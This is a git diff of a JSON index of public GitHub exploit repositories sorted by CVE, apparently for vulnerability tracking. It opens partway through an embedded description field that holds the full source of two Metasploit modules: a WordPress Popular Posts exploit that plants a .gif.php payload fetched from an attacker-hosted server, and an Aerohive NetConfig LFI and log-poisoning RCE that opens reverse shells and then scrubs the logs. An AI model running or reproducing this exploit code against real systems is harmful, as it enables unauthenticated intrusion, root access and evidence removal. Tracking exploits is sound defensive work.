[^\"]*)\/ =~ res.body ajax_nonce = enable_custom_fields(cookie, custom_nonce, post_id) end unless ajax_nonce.nil? vprint_status(\"ajax nonce: #{ajax_nonce}\") end unless wp_nonce.nil? vprint_status(\"wp nonce: #{wp_nonce}\") end unless post_id.nil? vprint_status(\"Created Post: #{post_id}\") end fail_with(Failure::UnexpectedReply, 'Unable to retrieve nonces and\/or new post id') unless ajax_nonce && wp_nonce && post_id # publish new post vprint_status(\"Writing content to Post: #{post_id}\") # this is very different from the EDB POC, I kept getting 200 to the home page with their example, so this is based off what the UI submits res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'ctype' => 'application\/json', 'accept' => 'application\/json', 'vars_get' => { '_locale' => 'user', 'rest_route' => normalize_uri(target_uri.path, 'wp', 'v2', 'posts', post_id) }, 'data' => { 'id' => post_id, 'title' => Rex::Text.rand_text_alphanumeric(20..30), 'content' => \"\\n#{Rex::Text.rand_text_alphanumeric(100..200)}<\/p>\\n\", 'status' => 'publish' }.to_json, 'headers' => { 'X-WP-Nonce' => wp_nonce, 'X-HTTP-Method-Override' => 'PUT' } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 fail_with(Failure::UnexpectedReply, 'Post failed to publish') unless res.body.include? '\"status\":\"publish\"' return post_id, ajax_nonce, wp_nonce end def add_meta(cookie, post_id, ajax_nonce, payload_name) payload_url = \"http:\/\/#{datastore['SRVHOSTNAME']}:#{datastore['SRVPORT']}\/#{payload_name}\" vprint_status(\"Adding malicious metadata for redirect to #{payload_url}\") res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_post' => { '_ajax_nonce' => 0, 'action' => 'add-meta', 'metakeyselect' => 'wpp_thumbnail', 'metakeyinput' => '', 'metavalue' => payload_url, '_ajax_nonce-add-meta' => ajax_nonce, 'post_id' => post_id } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 fail_with(Failure::UnexpectedReply, 'Failed to update metadata') unless res.body.include? \"
normalize_uri(target_uri.path, 'index.php'), 'keep_cookies' => 'true', 'cookie' => cookie, 'vars_get' => { 'page_id' => post_id } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 || res.code == 301 print_status(\"Sending #{post_count} views to #{res.headers['Location']}\") location = res.headers['Location'].split('\/')[3...-1].join('\/') # http:\/\/example.com\/\/ (1..post_count).each do |_c| res = send_request_cgi!( 'uri' => \"\/#{location}\", 'cookie' => cookie, 'keep_cookies' => 'true' ) # just send away, who cares about the response fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 res = send_request_cgi( # this URL varies from the POC on EDB, and is modeled after what the browser does 'uri' => normalize_uri(target_uri.path, 'index.php'), 'vars_get' => { 'rest_route' => normalize_uri('wordpress-popular-posts', 'v1', 'popular-posts') }, 'keep_cookies' => 'true', 'method' => 'POST', 'cookie' => cookie, 'vars_post' => { '_wpnonce' => wp_nonce, 'wpp_id' => post_id, 'sampling' => 0, 'sampling_rate' => 100 } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 201 end fail_with(Failure::Unreachable, 'Site not responding') unless res end def get_top_posts print_status('Determining post with most views') res = get_widget \/>(?\\d+) views<\/ =~ res.body views = views.to_i print_status(\"Top Views: #{views}\") views += 5 # make us the top post unless datastore['VISTS'].nil? print_status(\"Overriding post count due to VISITS being set, from #{views} to #{datastore['VISITS']}\") views = datastore['VISITS'] end views end def get_widget # load home page to grab the widget ID. At times we seem to hit the widget when it's refreshing and it doesn't respond # which then would kill the exploit, so in this case we just keep trying. (1..10).each do |_| @res = send_request_cgi( 'uri' => normalize_uri(target_uri.path), 'keep_cookies' => 'true' ) break unless @res.nil? end fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless @res.code == 200 \/data-widget-id=\"wpp-(?\\d+)\/ =~ @res.body # load the widget directly (1..10).each do |_| @res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php', 'wp-json', 'wordpress-popular-posts', 'v1', 'popular-posts', 'widget', widget_id), 'keep_cookies' => 'true', 'vars_get' => { 'is_single' => 0 } ) break unless @res.nil? end fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless @res.code == 200 @res end def exploit fail_with(Failure::BadConfig, 'SRVHOST must be set to an IP address (0.0.0.0 is invalid) for exploitation to be successful') if datastore['SRVHOST'] == '0.0.0.0' cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD']) if cookie.nil? vprint_error('Invalid login, check credentials') return end payload_name = \"#{Rex::Text.rand_text_alphanumeric(5..8)}.gif.php\" vprint_status(\"Payload file name: #{payload_name}\") fail_with(Failure::NotVulnerable, 'gd is not installed on server, uexploitable') unless check_gd_installed(cookie) post_count = get_top_posts # we dont need to pass the cookie anymore since its now saved into http client token = get_wpp_admin_token(cookie) vprint_status(\"wpp_admin_token: #{token}\") change_settings(cookie, token) clear_cache(cookie, token) post_id, ajax_nonce, wp_nonce = create_post(cookie) print_status('Starting web server to handle request for image payload') start_service({ 'Uri' => { 'Proc' => proc { |cli, req| on_request_uri(cli, req, payload_name, post_id) }, 'Path' => \"\/#{payload_name}\" } }) add_meta(cookie, post_id, ajax_nonce, payload_name) boost_post(cookie, post_id, wp_nonce, post_count) print_status('Waiting 90sec for cache refresh by server') Rex.sleep(90) print_status('Attempting to force loading of shell by visiting to homepage and loading the widget') res = get_widget print_good('We made it to the top!') if res.body.include? payload_name # if res.body.include? datastore['SRVHOSTNAME'] # fail_with(Failure::UnexpectedReply, \"Found #{datastore['SRVHOSTNAME']} in page content. Payload likely wasn't copied to the server.\") # end # at this point, we rely on our web server getting requests to make the rest happen endend### This module requires Metasploit: https:\/\/metasploit.com\/download# Current source: https:\/\/github.com\/rapid7\/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Aerohive NetConfig 10.0r8a LFI and log poisoning to RCE', 'Description' => %q{ This module exploits LFI and log poisoning vulnerabilities (CVE-2020-16152) in Aerohive NetConfig, version 10.0r8a build-242466 and older in order to achieve unauthenticated remote code execution as the root user. NetConfig is the Aerohive\/Extreme Networks HiveOS administrative webinterface. Vulnerable versions allow for LFI because they rely on a version of PHP 5 that is vulnerable to string truncation attacks. This module leverages this issue in conjunction with log poisoning to gain RCE as root. Upon successful exploitation, the Aerohive NetConfig application will hang for as long as the spawned shell remains open. Closing the session should render the app responsive again. The module provides an automatic cleanup option to clean the log. However, this option is disabled by default because any modifications to the \/tmp\/messages log, even via sed, may render the target (temporarily) unexploitable. This state can last over an hour. This module has been successfully tested against Aerohive NetConfig versions 8.2r4 and 10.0r7a. }, 'License' => MSF_LICENSE, 'Author' => [ 'Erik de Jong', # github.com\/eriknl - discovery and PoC 'Erik Wynter' # @wyntererik - Metasploit ], 'References' => [ ['CVE', '2020-16152'], # still categorized as RESERVED ['URL', 'https:\/\/github.com\/eriknl\/CVE-2020-16152'] # analysis and PoC code ], 'DefaultOptions' => { 'SSL' => true, 'RPORT' => 443 }, 'Platform' => %w[linux unix], 'Arch' => [ ARCH_ARMLE, ARCH_CMD ], 'Targets' => [ [ 'Linux', { 'Arch' => [ARCH_ARMLE], 'Platform' => 'linux', 'DefaultOptions' => { 'PAYLOAD' => 'linux\/armle\/meterpreter\/reverse_tcp', 'CMDSTAGER::FLAVOR' => 'curl' } } ], [ 'CMD', { 'Arch' => [ARCH_CMD], 'Platform' => 'unix', 'DefaultOptions' => { 'PAYLOAD' => 'cmd\/unix\/reverse_openssl' # this may be the only payload that works for this target' } } ] ], 'Privileged' => true, 'DisclosureDate' => '2020-02-17', 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [ CRASH_SAFE ], 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ], 'Reliability' => [ REPEATABLE_SESSION ] } ) ) register_options [ OptString.new('TARGETURI', [true, 'The base path to Aerohive NetConfig', '\/']), OptBool.new('AUTO_CLEAN_LOG', [true, 'Automatically clean the \/tmp\/messages log upon spawning a shell. WARNING! This may render the target unexploitable', false]), ] end def auto_clean_log datastore['AUTO_CLEAN_LOG'] end def check res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'index.php5') }) unless res return CheckCode::Unknown('Connection failed.') end unless res.code == 200 && res.body.include?('Aerohive NetConfig UI') return CheckCode::Safe('Target is not an Aerohive NetConfig application.') end version = res.body.scan(\/action=\"login\\.php5\\?version=(.*?)\"\/)&.flatten&.first unless version return CheckCode::Detected('Could not determine Aerohive NetConfig version.') end begin if Rex::Version.new(version) <= Rex::Version.new('10.0r8a') return CheckCode::Appears(\"The target is Aerohive NetConfig version #{version}\") else print_warning('It should be noted that it is unclear if\/when this issue was patched, so versions after 10.0r8a may still be vulnerable.') return CheckCode::Safe(\"The target is Aerohive NetConfig version #{version}\") end rescue StandardError => e return CheckCode::Unknown(\"Failed to obtain a valid Aerohive NetConfig version: #{e}\") end end def poison_log password = rand_text_alphanumeric(8..12) @shell_cmd_name = rand_text_alphanumeric(3..6) @poison_cmd = \"\" # Poison \/tmp\/messages print_status('Attempting to poison the log at \/tmp\/messages...') res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'login.php5'), 'vars_post' => { 'login_auth' => 0, 'miniHiveUI' => 1, 'authselect' => 'Name\/Password', 'userName' => @poison_cmd, 'password' => password } }) unless res fail_with(Failure::Disconnected, 'Connection failed while trying to poison the log at \/tmp\/messages') end unless res.code == 200 && res.body.include?('cmn\/redirectLogin.php5?ERROR_TYPE=MQ==') fail_with(Failure::UnexpectedReply, 'Unexpected response received while trying to poison the log at \/tmp\/messages') end print_status('Server responded as expected. Continuing...') end def on_new_session(session) log_cleaned = false if auto_clean_log print_status('Attempting to clean the log file at \/tmp\/messages...') print_warning('Please note this will render the target (temporarily) unexploitable. This state can last over an hour.') begin # We need remove the line containing the PHP system call from \/tmp\/messages # The special chars in the PHP syscall make it nearly impossible to use sed to replace the PHP syscall with a regular username. # Instead, let's avoid special chars by stringing together some grep commands to make sure we have the right line and then removing that entire line # The impact of using sed to edit the file on the fly and using grep to create a new file and overwrite \/tmp\/messages with it, is the same: # In both cases the app will likely stop writing to \/tmp\/messages for quite a while (could be over an hour), rendering the target unexploitable during that period. line_to_delete_file = \"\/tmp\/#{rand_text_alphanumeric(5..10)}\" clean_messages_file = \"\/tmp\/#{rand_text_alphanumeric(5..10)}\" cmds_to_clean_log = \"grep #{@shell_cmd_name} \/tmp\/messages | grep POST | grep 'php system' > #{line_to_delete_file}; \"\\ \"grep -vFf #{line_to_delete_file} \/tmp\/messages > #{clean_messages_file}; mv #{clean_messages_file} \/tmp\/messages; rm -f #{line_to_delete_file}\" if session.type.to_s.eql? 'meterpreter' session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi' session.sys.process.execute('\/bin\/sh', \"-c \\\"#{cmds_to_clean_log}\\\"\") # Wait for cleanup Rex.sleep 5 # Check for the PHP system call in \/tmp\/messages messages_contents = session.fs.file.open('\/tmp\/messages').read.to_s # using =~ here produced unexpected results, so include? is used instead unless messages_contents.include?(@poison_cmd) log_cleaned = true end elsif session.type.to_s.eql?('shell') session.shell_command_token(cmds_to_clean_log.to_s) # Check for the PHP system call in \/tmp\/messages poison_evidence = session.shell_command_token(\"grep #{@shell_cmd_name} \/tmp\/messages | grep POST | grep 'php system'\") # using =~ here produced unexpected results, so include? is used instead unless poison_evidence.include?(@poison_cmd) log_cleaned = true end end rescue StandardError => e print_error(\"Error during cleanup: #{e.message}\") ensure super end unless log_cleaned print_warning(\"Could not replace the PHP system call '#{@poison_cmd}' in \/tmp\/messages\") end end if log_cleaned print_good('Successfully cleaned up the log by deleting the line with the PHP syscal from \/tmp\/messages.') else print_warning(\"Erasing the log poisoning evidence will require manually editing\/removing the line in \/tmp\/messages that contains the poison command:\\n\\t#{@poison_cmd}\") print_warning('Please note that any modifications to \/tmp\/messages, even via sed, will render the target (temporarily) unexploitable. This state can last over an hour.') print_warning('Deleting \/tmp\/messages or clearing out the file may break the application.') end end def execute_command(cmd, _opts = {}) print_status('Attempting to execute the payload') send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'action.php5'), 'vars_get' => { '_action' => 'list', 'debug' => 'true' }, 'vars_post' => { '_page' => rand_text_alphanumeric(1) + '\/..' * 8 + '\/' * 4041 + '\/tmp\/messages', # Trigger LFI through path truncation @shell_cmd_name => cmd } }, 0) print_warning('In case of successful exploitation, the Aerohive NetConfig web application will hang for as long as the spawned shell remains open.') end def exploit poison_log if target.arch.first == ARCH_CMD print_status('Executing the payload') execute_command(payload.encoded) else execute_cmdstager(background: true) end endend",
+ "fork": false,
+ "created_at": "2022-01-02T08:08:00Z",
+ "updated_at": "2024-03-01T20:46:56Z",
+ "pushed_at": "2022-01-02T08:08:01Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 0
}
]
\ No newline at end of file
diff --git a/2020/CVE-2020-16846.json b/2020/CVE-2020-16846.json
index 341fb597f3..9960a7e56c 100644
--- a/2020/CVE-2020-16846.json
+++ b/2020/CVE-2020-16846.json
@@ -1,4 +1,34 @@
[
+ {
+ "id": 417081130,
+ "name": "CVE-2020-16846-Saltstack-Salt-API",
+ "full_name": "zomy22\/CVE-2020-16846-Saltstack-Salt-API",
+ "owner": {
+ "login": "zomy22",
+ "id": 59493928,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59493928?v=4",
+ "html_url": "https:\/\/github.com\/zomy22"
+ },
+ "html_url": "https:\/\/github.com\/zomy22\/CVE-2020-16846-Saltstack-Salt-API",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-10-14T10:09:48Z",
+ "updated_at": "2021-10-26T12:21:49Z",
+ "pushed_at": "2021-10-26T12:21:46Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
{
"id": 577393491,
"name": "projet-secu",
diff --git a/2020/CVE-2020-17057.json b/2020/CVE-2020-17057.json
index 09dbc1738d..f064278a38 100644
--- a/2020/CVE-2020-17057.json
+++ b/2020/CVE-2020-17057.json
@@ -28,5 +28,35 @@
"watchers": 0,
"score": 0,
"subscribers_count": 0
+ },
+ {
+ "id": 341907101,
+ "name": "CVE-2020-17057",
+ "full_name": "lsw29475\/CVE-2020-17057",
+ "owner": {
+ "login": "lsw29475",
+ "id": 13043359,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13043359?v=4",
+ "html_url": "https:\/\/github.com\/lsw29475"
+ },
+ "html_url": "https:\/\/github.com\/lsw29475\/CVE-2020-17057",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-02-24T13:19:44Z",
+ "updated_at": "2022-02-14T08:03:57Z",
+ "pushed_at": "2021-02-25T00:18:16Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
}
]
\ No newline at end of file
diff --git a/2020/CVE-2020-17087.json b/2020/CVE-2020-17087.json
index 56bd396fd7..f51e42c108 100644
--- a/2020/CVE-2020-17087.json
+++ b/2020/CVE-2020-17087.json
@@ -29,6 +29,36 @@
"score": 0,
"subscribers_count": 1
},
+ {
+ "id": 371444911,
+ "name": "OHTS_IE6052-CVE-2020-17087",
+ "full_name": "ykg88\/OHTS_IE6052-CVE-2020-17087",
+ "owner": {
+ "login": "ykg88",
+ "id": 12491544,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12491544?v=4",
+ "html_url": "https:\/\/github.com\/ykg88"
+ },
+ "html_url": "https:\/\/github.com\/ykg88\/OHTS_IE6052-CVE-2020-17087",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-05-27T16:55:39Z",
+ "updated_at": "2021-05-27T17:18:12Z",
+ "pushed_at": "2021-05-27T17:18:10Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
{
"id": 382397170,
"name": "Windows-Non-Paged-Pool-Overflow-Exploitation",
diff --git a/2020/CVE-2020-17136.json b/2020/CVE-2020-17136.json
new file mode 100644
index 0000000000..d2cc050fca
--- /dev/null
+++ b/2020/CVE-2020-17136.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 349044248,
+ "name": "CVE-2020-17136",
+ "full_name": "xyddnljydd\/CVE-2020-17136",
+ "owner": {
+ "login": "xyddnljydd",
+ "id": 28214509,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28214509?v=4",
+ "html_url": "https:\/\/github.com\/xyddnljydd"
+ },
+ "html_url": "https:\/\/github.com\/xyddnljydd\/CVE-2020-17136",
+ "description": "CVE-2020-17136 exploit",
+ "fork": false,
+ "created_at": "2021-03-18T11:16:36Z",
+ "updated_at": "2021-03-31T14:42:21Z",
+ "pushed_at": "2021-03-31T14:42:19Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 349138961,
+ "name": "CVE-2020-17136",
+ "full_name": "cssxn\/CVE-2020-17136",
+ "owner": {
+ "login": "cssxn",
+ "id": 11917920,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11917920?v=4",
+ "html_url": "https:\/\/github.com\/cssxn"
+ },
+ "html_url": "https:\/\/github.com\/cssxn\/CVE-2020-17136",
+ "description": "Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability",
+ "fork": false,
+ "created_at": "2021-03-18T16:13:23Z",
+ "updated_at": "2024-06-10T08:03:59Z",
+ "pushed_at": "2021-03-18T16:41:58Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-17453.json b/2020/CVE-2020-17453.json
index b24e0480d5..f4dd27cb30 100644
--- a/2020/CVE-2020-17453.json
+++ b/2020/CVE-2020-17453.json
@@ -1,4 +1,34 @@
[
+ {
+ "id": 354303685,
+ "name": "CVE-2020-17453-PoC",
+ "full_name": "ydycjz6j\/CVE-2020-17453-PoC",
+ "owner": {
+ "login": "ydycjz6j",
+ "id": 54763344,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54763344?v=4",
+ "html_url": "https:\/\/github.com\/ydycjz6j"
+ },
+ "html_url": "https:\/\/github.com\/ydycjz6j\/CVE-2020-17453-PoC",
+ "description": "PoC (Proof of Concept) - CVE-2020-17453",
+ "fork": false,
+ "created_at": "2021-04-03T13:49:39Z",
+ "updated_at": "2021-04-12T07:54:29Z",
+ "pushed_at": "2021-04-03T13:50:07Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
{
"id": 630316300,
"name": "CVE-2020-17453",
diff --git a/2020/CVE-2020-17456.json b/2020/CVE-2020-17456.json
new file mode 100644
index 0000000000..d38c671892
--- /dev/null
+++ b/2020/CVE-2020-17456.json
@@ -0,0 +1,65 @@
+[
+ {
+ "id": 331533622,
+ "name": "CVE-2020-17456",
+ "full_name": "Al1ex\/CVE-2020-17456",
+ "owner": {
+ "login": "Al1ex",
+ "id": 38161463,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38161463?v=4",
+ "html_url": "https:\/\/github.com\/Al1ex"
+ },
+ "html_url": "https:\/\/github.com\/Al1ex\/CVE-2020-17456",
+ "description": "CVE-2020-17456 & Seowon SLC 130 Router RCE",
+ "fork": false,
+ "created_at": "2021-01-21T06:16:40Z",
+ "updated_at": "2024-03-30T05:33:31Z",
+ "pushed_at": "2021-01-21T06:17:00Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2020-17456",
+ "seowon-slc"
+ ],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 468552106,
+ "name": "CVE-2020-17456-Seowon-SLR-120S42G-RCE-Exploit-Unauthenticated",
+ "full_name": "TAPESH-TEAM\/CVE-2020-17456-Seowon-SLR-120S42G-RCE-Exploit-Unauthenticated",
+ "owner": {
+ "login": "TAPESH-TEAM",
+ "id": 83407483,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83407483?v=4",
+ "html_url": "https:\/\/github.com\/TAPESH-TEAM"
+ },
+ "html_url": "https:\/\/github.com\/TAPESH-TEAM\/CVE-2020-17456-Seowon-SLR-120S42G-RCE-Exploit-Unauthenticated",
+ "description": "Seowon SLR-120S42G RCE Exploit \/ Remote Code Execution (Unauthenticated)",
+ "fork": false,
+ "created_at": "2022-03-11T00:16:35Z",
+ "updated_at": "2023-09-28T11:36:55Z",
+ "pushed_at": "2022-03-20T23:46:16Z",
+ "stargazers_count": 8,
+ "watchers_count": 8,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 8,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-17518.json b/2020/CVE-2020-17518.json
new file mode 100644
index 0000000000..9a6503cf1e
--- /dev/null
+++ b/2020/CVE-2020-17518.json
@@ -0,0 +1,92 @@
+[
+ {
+ "id": 327323010,
+ "name": "CVE-2020-17518",
+ "full_name": "QmF0c3UK\/CVE-2020-17518",
+ "owner": {
+ "login": "QmF0c3UK",
+ "id": 29447678,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29447678?v=4",
+ "html_url": "https:\/\/github.com\/QmF0c3UK"
+ },
+ "html_url": "https:\/\/github.com\/QmF0c3UK\/CVE-2020-17518",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-01-06T13:40:06Z",
+ "updated_at": "2023-09-28T11:23:42Z",
+ "pushed_at": "2021-01-06T13:41:04Z",
+ "stargazers_count": 9,
+ "watchers_count": 9,
+ "has_discussions": false,
+ "forks_count": 7,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 7,
+ "watchers": 9,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 328278486,
+ "name": "CVE-2020-17518",
+ "full_name": "murataydemir\/CVE-2020-17518",
+ "owner": {
+ "login": "murataydemir",
+ "id": 16391655,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16391655?v=4",
+ "html_url": "https:\/\/github.com\/murataydemir"
+ },
+ "html_url": "https:\/\/github.com\/murataydemir\/CVE-2020-17518",
+ "description": "[CVE-2020-17518] Apache Flink RESTful API Arbitrary File Upload via Directory Traversal",
+ "fork": false,
+ "created_at": "2021-01-10T01:12:45Z",
+ "updated_at": "2023-09-28T11:23:48Z",
+ "pushed_at": "2021-01-10T01:18:09Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 328410480,
+ "name": "Flink-CVE-2020-17518-getshell",
+ "full_name": "rakjong\/Flink-CVE-2020-17518-getshell",
+ "owner": {
+ "login": "rakjong",
+ "id": 38517715,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38517715?v=4",
+ "html_url": "https:\/\/github.com\/rakjong"
+ },
+ "html_url": "https:\/\/github.com\/rakjong\/Flink-CVE-2020-17518-getshell",
+ "description": "利用Apache Flink CVE-2020-17518 getshell",
+ "fork": false,
+ "created_at": "2021-01-10T15:06:40Z",
+ "updated_at": "2023-05-11T02:45:26Z",
+ "pushed_at": "2021-01-12T07:49:39Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-17519.json b/2020/CVE-2020-17519.json
new file mode 100644
index 0000000000..b353afef6a
--- /dev/null
+++ b/2020/CVE-2020-17519.json
@@ -0,0 +1,336 @@
+[
+ {
+ "id": 327174696,
+ "name": "CVE-2020-17519",
+ "full_name": "B1anda0\/CVE-2020-17519",
+ "owner": {
+ "login": "B1anda0",
+ "id": 74232513,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74232513?v=4",
+ "html_url": "https:\/\/github.com\/B1anda0"
+ },
+ "html_url": "https:\/\/github.com\/B1anda0\/CVE-2020-17519",
+ "description": "Apache Flink 目录遍历漏洞批量检测 (CVE-2020-17519)",
+ "fork": false,
+ "created_at": "2021-01-06T02:15:39Z",
+ "updated_at": "2024-05-28T09:05:13Z",
+ "pushed_at": "2021-01-06T23:51:32Z",
+ "stargazers_count": 48,
+ "watchers_count": 48,
+ "has_discussions": false,
+ "forks_count": 18,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 18,
+ "watchers": 48,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 327323355,
+ "name": "CVE-2020-17519",
+ "full_name": "QmF0c3UK\/CVE-2020-17519",
+ "owner": {
+ "login": "QmF0c3UK",
+ "id": 29447678,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29447678?v=4",
+ "html_url": "https:\/\/github.com\/QmF0c3UK"
+ },
+ "html_url": "https:\/\/github.com\/QmF0c3UK\/CVE-2020-17519",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-01-06T13:41:24Z",
+ "updated_at": "2023-09-28T11:23:42Z",
+ "pushed_at": "2021-01-06T13:41:58Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 327361663,
+ "name": "apache-flink-directory-traversal.nse",
+ "full_name": "dolevf\/apache-flink-directory-traversal.nse",
+ "owner": {
+ "login": "dolevf",
+ "id": 5857304,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5857304?v=4",
+ "html_url": "https:\/\/github.com\/dolevf"
+ },
+ "html_url": "https:\/\/github.com\/dolevf\/apache-flink-directory-traversal.nse",
+ "description": "Apache Flink Directory Traversal (CVE-2020-17519) Nmap NSE Script",
+ "fork": false,
+ "created_at": "2021-01-06T16:03:06Z",
+ "updated_at": "2023-07-15T09:24:44Z",
+ "pushed_at": "2021-01-06T16:04:03Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 327822303,
+ "name": "CVE-2020-17519",
+ "full_name": "hoanx4\/CVE-2020-17519",
+ "owner": {
+ "login": "hoanx4",
+ "id": 54475792,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54475792?v=4",
+ "html_url": "https:\/\/github.com\/hoanx4"
+ },
